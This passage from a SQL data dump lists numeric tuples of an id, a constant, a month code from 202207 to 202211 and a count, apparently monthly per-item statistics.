2,'202207',50),(4677,2,'202207',50),(84,2,'202207',51),(3030,2,'202207',51),(1582,2,'202207',52),(1612,2,'202207',52),(2809,2,'202207',52),(3117,2,'202207',52),(3066,2,'202207',54),(76,2,'202207',55),(4529,2,'202207',56),(3781,2,'202207',58),(2309,2,'202207',59),(3764,2,'202207',60),(1596,2,'202207',63),(4520,2,'202207',65),(89,2,'202207',66),(1602,2,'202207',73),(1594,2,'202207',74),(68,2,'202207',91),(2904,2,'202207',160),(1586,2,'202207',164),(72,2,'202207',181),(80,2,'202207',273),(9,2,'202207',3275),(110,2,'202208',5),(3273,2,'202208',7),(3097,2,'202208',8),(3240,2,'202208',8),(3249,2,'202208',8),(3265,2,'202208',8),(4363,2,'202208',8),(4373,2,'202208',8),(4382,2,'202208',8),(106,2,'202208',9),(1701,2,'202208',9),(1734,2,'202208',9),(1751,2,'202208',9),(2293,2,'202208',9),(3096,2,'202208',9),(3285,2,'202208',9),(3771,2,'202208',9),(4408,2,'202208',9),(4681,2,'202208',9),(1695,2,'202208',10),(1713,2,'202208',10),(1720,2,'202208',10),(3104,2,'202208',10),(3107,2,'202208',10),(3267,2,'202208',10),(3269,2,'202208',10),(3287,2,'202208',10),(4357,2,'202208',10),(4368,2,'202208',10),(4587,2,'202208',10),(4688,2,'202208',10),(1592,2,'202208',11),(1697,2,'202208',11),(1699,2,'202208',11),(1747,2,'202208',11),(1772,2,'202208',11),(2965,2,'202208',11),(2991,2,'202208',11),(3004,2,'202208',11),(3034,2,'202208',11),(3243,2,'202208',11),(3247,2,'202208',11),(3251,2,'202208',11),(3257,2,'202208',11),(3259,2,'202208',11),(3727,2,'202208',11),(4432,2,'202208',11),(4436,2,'202208',11),(4668,2,'202208',11),(4712,2,'202208',11),(4747,2,'202208',11),(4878,2,'202208',11),(1715,2,'202208',12),(1732,2,'202208',12),(1776,2,'202208',12),(1782,2,'202208',12),(2063,2,'202208',12),(2148,2,'202208',12),(2154,2,'202208',12),(2161,2,'202208',12),(2178,2,'202208',12),(2993,2,'202208',12),(3079,2,'202208',12),(3087,2,'202208',12),(3092,2,'202208',12),(3253,2,'202208',12),(3275,2,'202208',12),(3430,2,'202208',12),(4377,2,'202208',12),(4387,2,'202208',12),(4741,2,'202208',12),(4866,2,'202208',12),(1705,2,'202208',13),(1707,2,'202208',13),(1718,2,'202208',13),(1726,2,'202208',13),(1730,2,'202208',13),(1737,2,'202208',13),(1749,2,'202208',13),(1770,2,'202208',13),(2558,2,'202208',13),(2704,2,'202208',13),(2751,2,'202208',13),(2989,2,'202208',13),(3109,2,'202208',13),(3226,2,'202208',13),(3271,2,'202208',13),(3307,2,'202208',13),(3735,2,'202208',13),(3749,2,'202208',13),(3774,2,'202208',13),(4332,2,'202208',13),(4404,2,'202208',13),(4444,2,'202208',13),(4648,2,'202208',13),(4750,2,'202208',13),(4753,2,'202208',13),(4893,2,'202208',13),(484,2,'202208',14),(1590,2,'202208',14),(1739,2,'202208',14),(1774,2,'202208',14),(1778,2,'202208',14),(3005,2,'202208',14),(3041,2,'202208',14),(3124,2,'202208',14),(3282,2,'202208',14),(3486,2,'202208',14),(4396,2,'202208',14),(4440,2,'202208',14),(4448,2,'202208',14),(4514,2,'202208',14),(4858,2,'202208',14),(4883,2,'202208',14),(102,2,'202208',15),(473,2,'202208',15),(477,2,'202208',15),(1768,2,'202208',15),(2801,2,'202208',15),(3280,2,'202208',15),(3297,2,'202208',15),(3541,2,'202208',15),(3714,2,'202208',15),(3738,2,'202208',15),(4238,2,'202208',15),(4329,2,'202208',15),(4341,2,'202208',15),(4454,2,'202208',15),(4517,2,'202208',15),(4591,2,'202208',15),(483,2,'202208',16),(1604,2,'202208',16),(1745,2,'202208',16),(2150,2,'202208',16),(2156,2,'202208',16),(2248,2,'202208',16),(2297,2,'202208',16),(2457,2,'202208',16),(2748,2,'202208',16),(2775,2,'202208',16),(2964,2,'202208',16),(3531,2,'202208',16),(3721,2,'202208',16),(4275,2,'202208',16),(4428,2,'202208',16),(4546,2,'202208',16),(4566,2,'202208',16),(4870,2,'202208',16),(480,2,'202208',17),(482,2,'202208',17),(1711,2,'202208',17),(1743,2,'202208',17),(2956,2,'202208',17),(3102,2,'202208',17),(3290,2,'202208',17),(3316,2,'202208',17),(3498,2,'202208',17),(3777,2,'202208',17),(4301,2,'202208',17),(4391,2,'202208',17),(4556,2,'202208',17),(4608,2,'202208',17),(4612,2,'202208',17),(4697,2,'202208',17),(4756,2,'202208',17),(4762,2,'202208',17),(4888,2,'202208',17),(4897,2,'202208',17),(479,2,'202208',18),(481,2,'202208',18),(488,2,'202208',18),(1766,2,'202208',18),(2658,2,'202208',18),(3263,2,'202208',18),(3438,2,'202208',18),(3482,2,'202208',18),(3731,2,'202208',18),(4335,2,'202208',18),(4744,2,'202208',18),(4874,2,'202208',18),(4977,2,'202208',18),(471,2,'202208',19),(1703,2,'202208',19),(2165,2,'202208',19),(2911,2,'202208',19),(3006,2,'202208',19),(3045,2,'202208',19),(3261,2,'202208',19),(3278,2,'202208',19),(3534,2,'202208',19),(4551,2,'202208',19),(476,2,'202208',20),(1598,2,'202208',20),(1728,2,'202208',20),(1741,2,'202208',20),(2296,2,'202208',20),(2617,2,'202208',20),(3023,2,'202208',20),(3072,2,'202208',20),(3229,2,'202208',20),(3724,2,'202208',20),(3746,2,'202208',20),(4424,2,'202208',20),(4862,2,'202208',20),(4976,2,'202208',20),(4980,2,'202208',20),(468,2,'202208',21),(474,2,'202208',21),(486,2,'202208',21),(1780,2,'202208',21),(2252,2,'202208',21),(2609,2,'202208',21),(3038,2,'202208',21),(3090,2,'202208',21),(4542,2,'202208',21),(4674,2,'202208',21),(4694,2,'202208',21),(4759,2,'202208',21),(1584,2,'202208',22),(2813,2,'202208',22),(3060,2,'202208',22),(4524,2,'202208',22),(4930,2,'202208',22),(469,2,'202208',23),(470,2,'202208',23),(478,2,'202208',23),(1709,2,'202208',23),(3245,2,'202208',23),(3752,2,'202208',23),(4663,2,'202208',23),(4802,2,'202208',23),(487,2,'202208',24),(1606,2,'202208',24),(1724,2,'202208',24),(3479,2,'202208',24),(4792,2,'202208',24),(4983,2,'202208',24),(1588,2,'202208',25),(2152,2,'202208',25),(3710,2,'202208',25),(4416,2,'202208',25),(4582,2,'202208',25),(4651,2,'202208',25),(4654,2,'202208',25),(4703,2,'202208',25),(4988,2,'202208',25),(472,2,'202208',26),(485,2,'202208',26),(570,2,'202208',26),(2159,2,'202208',26),(3489,2,'202208',26),(4457,2,'202208',26),(4685,2,'202208',26),(4691,2,'202208',26),(4700,2,'202208',26),(4709,2,'202208',26),(1722,2,'202208',27),(3083,2,'202208',27),(3742,2,'202208',27),(4657,2,'202208',27),(4706,2,'202208',27),(3069,2,'202208',28),(4326,2,'202208',28),(4645,2,'202208',28),(1600,2,'202208',29),(2769,2,'202208',29),(3063,2,'202208',29),(3313,2,'202208',29),(4660,2,'202208',29),(4797,2,'202208',29),(4338,2,'202208',30),(4722,2,'202208',30),(1608,2,'202208',31),(2309,2,'202208',31),(3127,2,'202208',31),(4400,2,'202208',31),(4529,2,'202208',31),(4677,2,'202208',31),(1614,2,'202208',32),(3066,2,'202208',32),(3027,2,'202208',33),(4323,2,'202208',33),(4412,2,'202208',33),(4765,2,'202208',33),(4768,2,'202208',33),(1610,2,'202208',34),(2804,2,'202208',34),(335,2,'202208',35),(3117,2,'202208',35),(4776,2,'202208',36),(467,2,'202208',37),(4420,2,'202208',37),(4771,2,'202208',37),(87,2,'202208',38),(1582,2,'202208',38),(3030,2,'202208',38),(74,2,'202208',40),(2809,2,'202208',40),(4520,2,'202208',40),(1612,2,'202208',42),(108,2,'202208',45),(76,2,'202208',46),(1544,2,'202208',48),(3781,2,'202208',48),(3764,2,'202208',49),(2503,2,'202208',50),(84,2,'202208',52),(89,2,'202208',52),(1594,2,'202208',52),(1602,2,'202208',58),(68,2,'202208',62),(91,2,'202208',66),(1596,2,'202208',68),(72,2,'202208',99),(2904,2,'202208',114),(1586,2,'202208',126),(80,2,'202208',224),(9,2,'202208',2437),(5140,2,'202209',7),(106,2,'202209',9),(1697,2,'202209',9),(1730,2,'202209',10),(2156,2,'202209',10),(3541,2,'202209',10),(4797,2,'202209',10),(110,2,'202209',11),(1695,2,'202209',11),(1707,2,'202209',11),(1734,2,'202209',11),(2293,2,'202209',11),(2993,2,'202209',11),(3004,2,'202209',11),(1699,2,'202209',12),(1701,2,'202209',12),(1711,2,'202209',12),(1720,2,'202209',12),(1768,2,'202209',12),(3269,2,'202209',12),(4648,2,'202209',12),(1715,2,'202209',13),(1747,2,'202209',13),(1751,2,'202209',13),(1780,2,'202209',13),(2964,2,'202209',13),(3240,2,'202209',13),(3265,2,'202209',13),(3273,2,'202209',13),(4591,2,'202209',13),(5024,2,'202209',13),(5076,2,'202209',13),(1705,2,'202209',14),(1713,2,'202209',14),(1726,2,'202209',14),(1743,2,'202209',14),(1772,2,'202209',14),(1782,2,'202209',14),(3079,2,'202209',14),(3109,2,'202209',14),(3749,2,'202209',14),(4363,2,'202209',14),(4387,2,'202209',14),(4404,2,'202209',14),(4408,2,'202209',14),(4428,2,'202209',14),(4608,2,'202209',14),(4741,2,'202209',14),(4862,2,'202209',14),(5033,2,'202209',14),(1749,2,'202209',15),(2248,2,'202209',15),(3092,2,'202209',15),(3096,2,'202209',15),(3104,2,'202209',15),(3249,2,'202209',15),(3259,2,'202209',15),(3287,2,'202209',15),(4357,2,'202209',15),(4377,2,'202209',15),(4396,2,'202209',15),(4668,2,'202209',15),(482,2,'202209',16),(2152,2,'202209',16),(3226,2,'202209',16),(3247,2,'202209',16),(3282,2,'202209',16),(3290,2,'202209',16),(3486,2,'202209',16),(3738,2,'202209',16),(3774,2,'202209',16),(4373,2,'202209',16),(4424,2,'202209',16),(4432,2,'202209',16),(4448,2,'202209',16),(4688,2,'202209',16),(4712,2,'202209',16),(4858,2,'202209',16),(5037,2,'202209',16),(5042,2,'202209',16),(5062,2,'202209',16),(1703,2,'202209',17),(1732,2,'202209',17),(1770,2,'202209',17),(2063,2,'202209',17),(2148,2,'202209',17),(2252,2,'202209',17),(2658,2,'202209',17),(2965,2,'202209',17),(3087,2,'202209',17),(3097,2,'202209',17),(3229,2,'202209',17),(3280,2,'202209',17),(3285,2,'202209',17),(3430,2,'202209',17),(3438,2,'202209',17),(3727,2,'202209',17),(4332,2,'202209',17),(4382,2,'202209',17),(4587,2,'202209',17),(4681,2,'202209',17),(4750,2,'202209',17),(4792,2,'202209',17),(4866,2,'202209',17),(4870,2,'202209',17),(4883,2,'202209',17),(102,2,'202209',18),(479,2,'202209',18),(483,2,'202209',18),(484,2,'202209',18),(1737,2,'202209',18),(1741,2,'202209',18),(1778,2,'202209',18),(2154,2,'202209',18),(2178,2,'202209',18),(3107,2,'202209',18),(3253,2,'202209',18),(3271,2,'202209',18),(3531,2,'202209',18),(4368,2,'202209',18),(4747,2,'202209',18),(4874,2,'202209',18),(4878,2,'202209',18),(4893,2,'202209',18),(5020,2,'202209',18),(5028,2,'202209',18),(5067,2,'202209',18),(1592,2,'202209',19),(2956,2,'202209',19),(2989,2,'202209',19),(2991,2,'202209',19),(3243,2,'202209',19),(3251,2,'202209',19),(4341,2,'202209',19),(4454,2,'202209',19),(4756,2,'202209',19),(5046,2,'202209',19),(5050,2,'202209',19),(5071,2,'202209',19),(480,2,'202209',20),(1590,2,'202209',20),(2801,2,'202209',20),(2911,2,'202209',20),(3124,2,'202209',20),(3275,2,'202209',20),(3482,2,'202209',20),(3771,2,'202209',20),(3777,2,'202209',20),(4275,2,'202209',20),(4444,2,'202209',20),(5054,2,'202209',20),(1718,2,'202209',21),(1739,2,'202209',21),(2150,2,'202209',21),(2751,2,'202209',21),(3257,2,'202209',21),(3278,2,'202209',21),(3297,2,'202209',21),(3752,2,'202209',21),(4566,2,'202209',21),(4612,2,'202209',21),(4759,2,'202209',21),(4888,2,'202209',21),(4897,2,'202209',21),(5058,2,'202209',21),(5137,2,'202209',21),(478,2,'202209',22),(485,2,'202209',22),(488,2,'202209',22),(1774,2,'202209',22),(2558,2,'202209',22),(2617,2,'202209',22),(3714,2,'202209',22),(3721,2,'202209',22),(4301,2,'202209',22),(4329,2,'202209',22),(4391,2,'202209',22),(4436,2,'202209',22),(4765,2,'202209',22),(4802,2,'202209',22),(5080,2,'202209',22),(471,2,'202209',23),(2161,2,'202209',23),(3041,2,'202209',23),(3072,2,'202209',23),(3307,2,'202209',23),(3316,2,'202209',23),(3724,2,'202209',23),(3746,2,'202209',23),(481,2,'202209',24),(1709,2,'202209',24),(2296,2,'202209',24),(3245,2,'202209',24),(3267,2,'202209',24),(3498,2,'202209',24),(4335,2,'202209',24),(4416,2,'202209',24),(4514,2,'202209',24),(4517,2,'202209',24),(4542,2,'202209',24),(4546,2,'202209',24),(4753,2,'202209',24),(4762,2,'202209',24),(1776,2,'202209',25),(2297,2,'202209',25),(3034,2,'202209',25),(3038,2,'202209',25),(3045,2,'202209',25),(3102,2,'202209',25),(3731,2,'202209',25),(4238,2,'202209',25),(4977,2,'202209',25),(5125,2,'202209',25),(5128,2,'202209',25),(2457,2,'202209',26),(3063,2,'202209',26),(3489,2,'202209',26),(3735,2,'202209',26),(5134,2,'202209',26),(476,2,'202209',27),(477,2,'202209',27),(2704,2,'202209',27),(2748,2,'202209',27),(2813,2,'202209',27),(3005,2,'202209',27),(3534,2,'202209',27),(4524,2,'202209',27),(4776,2,'202209',27),(473,2,'202209',28),(1604,2,'202209',28),(2165,2,'202209',28),(2775,2,'202209',28),(3023,2,'202209',28),(3090,2,'202209',28),(4691,2,'202209',28),(4768,2,'202209',28),(5131,2,'202209',28),(486,2,'202209',29),(487,2,'202209',29),(1745,2,'202209',29),(1766,2,'202209',29),(3261,2,'202209',29),(3263,2,'202209',29),(4556,2,'202209',29),(4663,2,'202209',29),(4744,2,'202209',29),(5122,2,'202209',29),(2159,2,'202209',30),(4551,2,'202209',30),(4651,2,'202209',30),(1728,2,'202209',31),(3479,2,'202209',31),(4674,2,'202209',31),(4703,2,'202209',31),(3060,2,'202209',32),(3083,2,'202209',32),(3127,2,'202209',32),(4440,2,'202209',32),(4657,2,'202209',32),(4677,2,'202209',32),(4700,2,'202209',32),(4706,2,'202209',32),(4722,2,'202209',32),(470,2,'202209',33),(474,2,'202209',33),(1722,2,'202209',33),(4412,2,'202209',33),(4582,2,'202209',33),(468,2,'202209',34),(472,2,'202209',34),(1584,2,'202209',34),(1606,2,'202209',34),(2609,2,'202209',34),(3742,2,'202209',34),(4685,2,'202209',34),(5101,2,'202209',34),(4326,2,'202209',35),(469,2,'202209',36),(1614,2,'202209',36),(4980,2,'202209',37),(1724,2,'202209',38),(3006,2,'202209',38),(4529,2,'202209',38),(3069,2,'202209',39),(3117,2,'202209',39),(2769,2,'202209',40),(4400,2,'202209',40),(4654,2,'202209',40),(1608,2,'202209',42),(3027,2,'202209',42),(1588,2,'202209',43),(2804,2,'202209',43),(2309,2,'202209',44),(3710,2,'202209',44),(4323,2,'202209',44),(467,2,'202209',45),(1598,2,'202209',45),(3066,2,'202209',45),(4420,2,'202209',45),(4976,2,'202209',45),(4988,2,'202209',45),(335,2,'202209',46),(3313,2,'202209',46),(4771,2,'202209',46),(4983,2,'202209',46),(4645,2,'202209',47),(4697,2,'202209',48),(74,2,'202209',49),(2809,2,'202209',49),(4709,2,'202209',49),(570,2,'202209',50),(4660,2,'202209',50),(1600,2,'202209',57),(4694,2,'202209',57),(84,2,'202209',58),(1582,2,'202209',58),(3030,2,'202209',58),(4520,2,'202209',58),(108,2,'202209',60),(4457,2,'202209',60),(1612,2,'202209',61),(2503,2,'202209',62),(3781,2,'202209',62),(4338,2,'202209',62),(4996,2,'202209',62),(87,2,'202209',63),(1602,2,'202209',63),(1544,2,'202209',66),(3764,2,'202209',72),(1610,2,'202209',74),(4930,2,'202209',75),(76,2,'202209',80),(1594,2,'202209',84),(1596,2,'202209',87),(89,2,'202209',96),(91,2,'202209',97),(72,2,'202209',99),(68,2,'202209',117),(2904,2,'202209',125),(1586,2,'202209',169),(80,2,'202209',312),(9,2,'202209',2875),(110,2,'202210',10),(106,2,'202210',12),(2293,2,'202210',12),(1705,2,'202210',13),(1747,2,'202210',13),(1782,2,'202210',13),(2161,2,'202210',13),(4744,2,'202210',13),(1699,2,'202210',14),(3247,2,'202210',14),(3727,2,'202210',14),(4858,2,'202210',14),(1732,2,'202210',15),(1739,2,'202210',15),(2156,2,'202210',15),(3280,2,'202210',15),(4440,2,'202210',15),(4542,2,'202210',15),(5020,2,'202210',15),(1734,2,'202210',16),(1741,2,'202210',16),(1745,2,'202210',16),(1776,2,'202210',16),(2956,2,'202210',16),(3041,2,'202210',16),(3229,2,'202210',16),(3271,2,'202210',16),(4432,2,'202210',16),(4444,2,'202210',16),(4546,2,'202210',16),(4883,2,'202210',16),(4893,2,'202210',16),(4977,2,'202210',16),(1715,2,'202210',17),(1720,2,'202210',17),(2150,2,'202210',17),(2252,2,'202210',17),(2991,2,'202210',17),(3092,2,'202210',17),(3278,2,'202210',17),(4373,2,'202210',17),(4382,2,'202210',17),(4514,2,'202210',17),(4517,2,'202210',17),(4591,2,'202210',17),(4753,2,'202210',17),(4768,2,'202210',17),(4866,2,'202210',17),(4870,2,'202210',17),(478,2,'202210',18),(1590,2,'202210',18),(1592,2,'202210',18),(1707,2,'202210',18),(1743,2,'202210',18),(1772,2,'202210',18),(2063,2,'202210',18),(3004,2,'202210',18),(3245,2,'202210',18),(3253,2,'202210',18),(3269,2,'202210',18),(3297,2,'202210',18),(4357,2,'202210',18),(4368,2,'202210',18),(4396,2,'202210',18),(4400,2,'202210',18),(4404,2,'202210',18),(4408,2,'202210',18),(4436,2,'202210',18),(4681,2,'202210',18),(4688,2,'202210',18),(4897,2,'202210',18),(5024,2,'202210',18),(5054,2,'202210',18),(5153,2,'202210',18),(480,2,'202210',19),(1697,2,'202210',19),(1701,2,'202210',19),(1768,2,'202210',19),(3005,2,'202210',19),(3023,2,'202210',19),(3027,2,'202210',19),(3038,2,'202210',19),(3096,2,'202210',19),(3097,2,'202210',19),(3240,2,'202210',19),(3257,2,'202210',19),(3259,2,'202210',19),(3267,2,'202210',19),(3714,2,'202210',19),(3735,2,'202210',19),(3738,2,'202210',19),(4556,2,'202210',19),(4612,2,'202210',19),(4685,2,'202210',19),(4712,2,'202210',19),(4741,2,'202210',19),(4792,2,'202210',19),(4802,2,'202210',19),(4862,2,'202210',19),(5042,2,'202210',19),(5157,2,'202210',19),(476,2,'202210',20),(1703,2,'202210',20),(1709,2,'202210',20),(1780,2,'202210',20),(2558,2,'202210',20),(2751,2,'202210',20),(2801,2,'202210',20),(3063,2,'202210',20),(3243,2,'202210',20),(3249,2,'202210',20),(3251,2,'202210',20),(3261,2,'202210',20),(3265,2,'202210',20),(3273,2,'202210',20),(3275,2,'202210',20),(3282,2,'202210',20),(3307,2,'202210',20),(4275,2,'202210',20),(4332,2,'202210',20),(4377,2,'202210',20),(4391,2,'202210',20),(4424,2,'202210',20),(4648,2,'202210',20),(4765,2,'202210',20),(4797,2,'202210',20),(4878,2,'202210',20),(4888,2,'202210',20),(4980,2,'202210',20),(5037,2,'202210',20),(5046,2,'202210',20),(5067,2,'202210',20),(483,2,'202210',21),(1730,2,'202210',21),(1751,2,'202210',21),(1778,2,'202210',21),(2165,2,'202210',21),(2804,2,'202210',21),(2989,2,'202210',21),(2993,2,'202210',21),(3109,2,'202210',21),(3226,2,'202210',21),(3285,2,'202210',21),(3290,2,'202210',21),(3438,2,'202210',21),(3731,2,'202210',21),(3742,2,'202210',21),(4301,2,'202210',21),(4326,2,'202210',21),(4363,2,'202210',21),(4428,2,'202210',21),(4448,2,'202210',21),(4551,2,'202210',21),(4651,2,'202210',21),(4668,2,'202210',21),(4750,2,'202210',21),(4771,2,'202210',21),(4874,2,'202210',21),(5033,2,'202210',21),(471,2,'202210',22),(1737,2,'202210',22),(1749,2,'202210',22),(2248,2,'202210',22),(2617,2,'202210',22),(2748,2,'202210',22),(2964,2,'202210',22),(3079,2,'202210',22),(3104,2,'202210',22),(3316,2,'202210',22),(3479,2,'202210',22),(3482,2,'202210',22),(3541,2,'202210',22),(3724,2,'202210',22),(3746,2,'202210',22),(4341,2,'202210',22),(4387,2,'202210',22),(4566,2,'202210',22),(4582,2,'202210',22),(4756,2,'202210',22),(4983,2,'202210',22),(5050,2,'202210',22),(479,2,'202210',23),(488,2,'202210',23),(1695,2,'202210',23),(1770,2,'202210',23),(1774,2,'202210',23),(2152,2,'202210',23),(3090,2,'202210',23),(3771,2,'202210',23),(3774,2,'202210',23),(4329,2,'202210',23),(4722,2,'202210',23),(5122,2,'202210',23),(5140,2,'202210',23),(5146,2,'202210',23),(477,2,'202210',24),(482,2,'202210',24),(2178,2,'202210',24),(3034,2,'202210',24),(3045,2,'202210',24),(3124,2,'202210',24),(3263,2,'202210',24),(3531,2,'202210',24),(3710,2,'202210',24),(3721,2,'202210',24),(3749,2,'202210',24),(3777,2,'202210',24),(4335,2,'202210',24),(4524,2,'202210',24),(4529,2,'202210',24),(4691,2,'202210',24),(4759,2,'202210',24),(5080,2,'202210',24),(102,2,'202210',25),(481,2,'202210',25),(1584,2,'202210',25),(1711,2,'202210',25),(1713,2,'202210',25),(2775,2,'202210',25),(2813,2,'202210',25),(2965,2,'202210',25),(3087,2,'202210',25),(3127,2,'202210',25),(3287,2,'202210',25),(3752,2,'202210',25),(4608,2,'202210',25),(4657,2,'202210',25),(4762,2,'202210',25),(4776,2,'202210',25),(4988,2,'202210',25),(1726,2,'202210',26),(2154,2,'202210',26),(2609,2,'202210',26),(3486,2,'202210',26),(4238,2,'202210',26),(4454,2,'202210',26),(4747,2,'202210',26),(4976,2,'202210',26),(484,2,'202210',27),(485,2,'202210',27),(1604,2,'202210',27),(1718,2,'202210',27),(2297,2,'202210',27),(3072,2,'202210',27),(3117,2,'202210',27),(3430,2,'202210',27),(3489,2,'202210',27),(3498,2,'202210',27),(5058,2,'202210',27),(5101,2,'202210',27),(473,2,'202210',28),(1766,2,'202210',28),(3534,2,'202210',28),(5128,2,'202210',28),(2148,2,'202210',29),(2159,2,'202210',29),(2658,2,'202210',29),(3313,2,'202210',29),(4420,2,'202210',29),(4587,2,'202210',29),(4654,2,'202210',29),(4709,2,'202210',29),(469,2,'202210',30),(486,2,'202210',30),(3083,2,'202210',30),(3107,2,'202210',30),(4323,2,'202210',30),(4703,2,'202210',30),(570,2,'202210',31),(2704,2,'202210',31),(3006,2,'202210',31),(4697,2,'202210',31),(5028,2,'202210',31),(1614,2,'202210',32),(2296,2,'202210',32),(2769,2,'202210',32),(2911,2,'202210',32),(4660,2,'202210',32),(4694,2,'202210',32),(467,2,'202210',33),(1606,2,'202210',33),(1724,2,'202210',33),(4996,2,'202210',33),(472,2,'202210',34),(487,2,'202210',34),(4416,2,'202210',34),(5062,2,'202210',34),(468,2,'202210',35),(474,2,'202210',35),(5071,2,'202210',35),(5131,2,'202210',35),(2457,2,'202210',36),(5076,2,'202210',37),(1728,2,'202210',39),(4674,2,'202210',39),(3102,2,'202210',40),(4412,2,'202210',40),(4677,2,'202210',40),(5137,2,'202210',40),(470,2,'202210',41),(4706,2,'202210',41),(5134,2,'202210',41),(74,2,'202210',42),(2309,2,'202210',42),(335,2,'202210',43),(1588,2,'202210',43),(2809,2,'202210',43),(108,2,'202210',44),(1596,2,'202210',44),(4663,2,'202210',44),(1600,2,'202210',45),(3066,2,'202210',45),(3069,2,'202210',46),(4457,2,'202210',46),(4520,2,'202210',46),(1608,2,'202210',47),(4645,2,'202210',47),(4930,2,'202210',47),(5163,2,'202210',47),(1598,2,'202210',48),(3060,2,'202210',49),(5125,2,'202210',50),(1610,2,'202210',51),(1722,2,'202210',51),(4338,2,'202210',52),(4700,2,'202210',54),(84,2,'202210',55),(2503,2,'202210',58),(87,2,'202210',59),(3781,2,'202210',61),(1602,2,'202210',67),(1612,2,'202210',68),(1594,2,'202210',71),(76,2,'202210',72),(3764,2,'202210',78),(89,2,'202210',83),(1582,2,'202210',83),(68,2,'202210',85),(91,2,'202210',91),(3030,2,'202210',108),(2904,2,'202210',111),(1586,2,'202210',118),(1544,2,'202210',140),(72,2,'202210',172),(80,2,'202210',275),(9,2,'202210',2849),(106,2,'202211',5),(1705,2,'202211',8),(3541,2,'202211',9),(2993,2,'202211',10),(3249,2,'202211',10),(4432,2,'202211',10),(1699,2,'202211',11),(1715,2,'202211',11),(1732,2,'202211',11),(3079,2,'202211',11),(3247,2,'202211',11),(3251,2,'202211',11),(3267,2,'202211',11),(3280,2,'202211',11),(3727,2,'202211',11),(3749,2,'202211',11),(110,2,'202211',12),(1730,2,'202211',12),(3096,2,'202211',12),(3486,2,'202211',12),(4363,2,'202211',12),(4792,2,'202211',12),(1695,2,'202211',13),(1697,2,'202211',13),(1720,2,'202211',13),(1749,2,'202211',13),(1768,2,'202211',13),(1772,2,'202211',13),(1776,2,'202211',13),(1778,2,'202211',13),(2063,2,'202211',13),(2156,2,'202211',13),(3257,2,'202211',13),(3731,2,'202211',13),(3738,2,'202211',13),(4275,2,'202211',13),(4382,2,'202211',13),(4387,2,'202211',13),(1701,2,'202211',14),(1709,2,'202211',14),(1734,2,'202211',14),(1739,2,'202211',14),(1741,2,'202211',14),(1747,2,'202211',14),(1780,2,'202211',14),(1782,2,'202211',14),(2150,2,'202211',14),(2248,2,'202211',14),(2293,2,'202211',14),(2296,2,'202211',14),(2748,2,'202211',14),(3109,2,'202211',14),(3243,2,'202211',14),(3271,2,'202211',14),(3282,2,'202211',14),(3746,2,'202211',14),(3752,2,'202211',14),(4373,2,'202211',14),(4377,2,'202211',14),(4408,2,'202211',14),(4440,2,'202211',14),(4648,2,'202211',14),(4750,2,'202211',14),(4858,2,'202211',14),(4878,2,'202211',14),(4883,2,'202211',14),(5067,2,'202211',14),(102,2,'202211',15),(1703,2,'202211',15),(1707,2,'202211',15),(1770,2,'202211',15),(2152,2,'202211',15),(2252,2,'202211',15),(2558,2,'202211',15),(2991,2,'202211',15),(3092,2,'202211',15),(3097,2,'202211',15),(3259,2,'202211',15),(3316,2,'202211',15),(3534,2,'202211',15),(3714,2,'202211',15),(3735,2,'202211',15),(4396,2,'202211',15),(4424,2,'202211',15),(4517,2,'202211',15),(4546,2,'202211',15),(4591,2,'202211',15),(4688,2,'202211',15),(4802,2,'202211',15),(4866,2,'202211',15),(4888,2,'202211',15),(5020,2,'202211',15),(5050,2,'202211',15),(478,2,'202211',16),(483,2,'202211',16),(488,2,'202211',16),(1743,2,'202211',16),(2148,2,'202211',16),(3004,2,'202211',16),(3038,2,'202211',16),(3275,2,'202211',16),(3285,2,'202211',16),(3287,2,'202211',16),(3307,2,'202211',16),(4368,2,'202211',16),(4566,2,'202211',16),(4651,2,'202211',16),(4797,2,'202211',16),(2617,2,'202211',17),(2989,2,'202211',17),(3041,2,'202211',17),(3072,2,'202211',17),(3087,2,'202211',17),(3229,2,'202211',17),(3245,2,'202211',17),(3263,2,'202211',17),(3269,2,'202211',17),(3498,2,'202211',17),(3777,2,'202211',17),(4400,2,'202211',17),(4542,2,'202211',17),(4654,2,'202211',17),(4657,2,'202211',17),(4744,2,'202211',17),(4862,2,'202211',17),(4870,2,'202211',17),(5024,2,'202211',17),(5058,2,'202211',17),(480,2,'202211',18),(482,2,'202211',18),(2704,2,'202211',18),(2964,2,'202211',18),(3034,2,'202211',18),(3124,2,'202211',18),(3531,2,'202211',18),(4357,2,'202211',18),(4582,2,'202211',18),(4608,2,'202211',18),(4681,2,'202211',18),(4741,2,'202211',18),(4756,2,'202211',18),(4893,2,'202211',18),(4897,2,'202211',18),(4983,2,'202211',18),(5042,2,'202211',18),(5080,2,'202211',18),(471,2,'202211',19),(484,2,'202211',19),(1713,2,'202211',19),(1774,2,'202211',19),(2154,2,'202211',19),(2161,2,'202211',19),(2956,2,'202211',19),(3045,2,'202211',19),(3090,2,'202211',19),(3107,2,'202211',19),(3226,2,'202211',19),(3240,2,'202211',19),(3253,2,'202211',19),(3261,2,'202211',19),(3297,2,'202211',19),(3489,2,'202211',19),(3721,2,'202211',19),(4332,2,'202211',19),(4436,2,'202211',19),(4514,2,'202211',19),(4691,2,'202211',19),(4712,2,'202211',19),(4980,2,'202211',19),(5037,2,'202211',19),(5054,2,'202211',19),(476,2,'202211',20),(485,2,'202211',20),(1711,2,'202211',20),(2751,2,'202211',20),(3127,2,'202211',20),(3724,2,'202211',20),(4329,2,'202211',20),(4341,2,'202211',20),(4587,2,'202211',20),(4668,2,'202211',20),(4747,2,'202211',20),(4753,2,'202211',20),(4759,2,'202211',20),(4874,2,'202211',20),(5033,2,'202211',20),(5046,2,'202211',20),(1751,2,'202211',21),(1766,2,'202211',21),(2609,2,'202211',21),(3278,2,'202211',21),(3313,2,'202211',21),(3742,2,'202211',21),(3774,2,'202211',21),(4404,2,'202211',21),(4448,2,'202211',21),(4612,2,'202211',21),(4685,2,'202211',21),(4697,2,'202211',21),(1592,2,'202211',22),(2775,2,'202211',22),(2965,2,'202211',22),(3023,2,'202211',22),(3104,2,'202211',22),(3273,2,'202211',22),(3482,2,'202211',22),(3771,2,'202211',22),(4326,2,'202211',22),(4444,2,'202211',22),(4663,2,'202211',22),(4768,2,'202211',22),(2178,2,'202211',23),(2297,2,'202211',23),(3006,2,'202211',23),(3027,2,'202211',23),(3265,2,'202211',23),(3479,2,'202211',23),(4301,2,'202211',23),(4722,2,'202211',23),(4977,2,'202211',23),(4988,2,'202211',23),(5125,2,'202211',23),(479,2,'202211',24),(1584,2,'202211',24),(1590,2,'202211',24),(2165,2,'202211',24),(3063,2,'202211',24),(3438,2,'202211',24),(4551,2,'202211',24),(4556,2,'202211',2